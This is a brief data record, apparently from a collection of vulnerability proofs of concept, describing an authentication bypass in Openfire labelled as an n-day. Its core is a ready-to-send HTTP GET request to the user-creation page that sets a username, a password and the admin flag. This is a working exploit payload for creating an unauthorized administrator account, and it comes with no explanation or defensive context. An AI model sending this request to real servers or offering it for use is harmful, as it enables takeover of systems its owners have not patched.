vendor = "Openfire"
name = "Openfire身份认证绕过漏洞"
type = "认证绕过"
source = "TG"
date = "08.14"
poc = "GET /user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............ HTTP/1.1"
label = "nday"
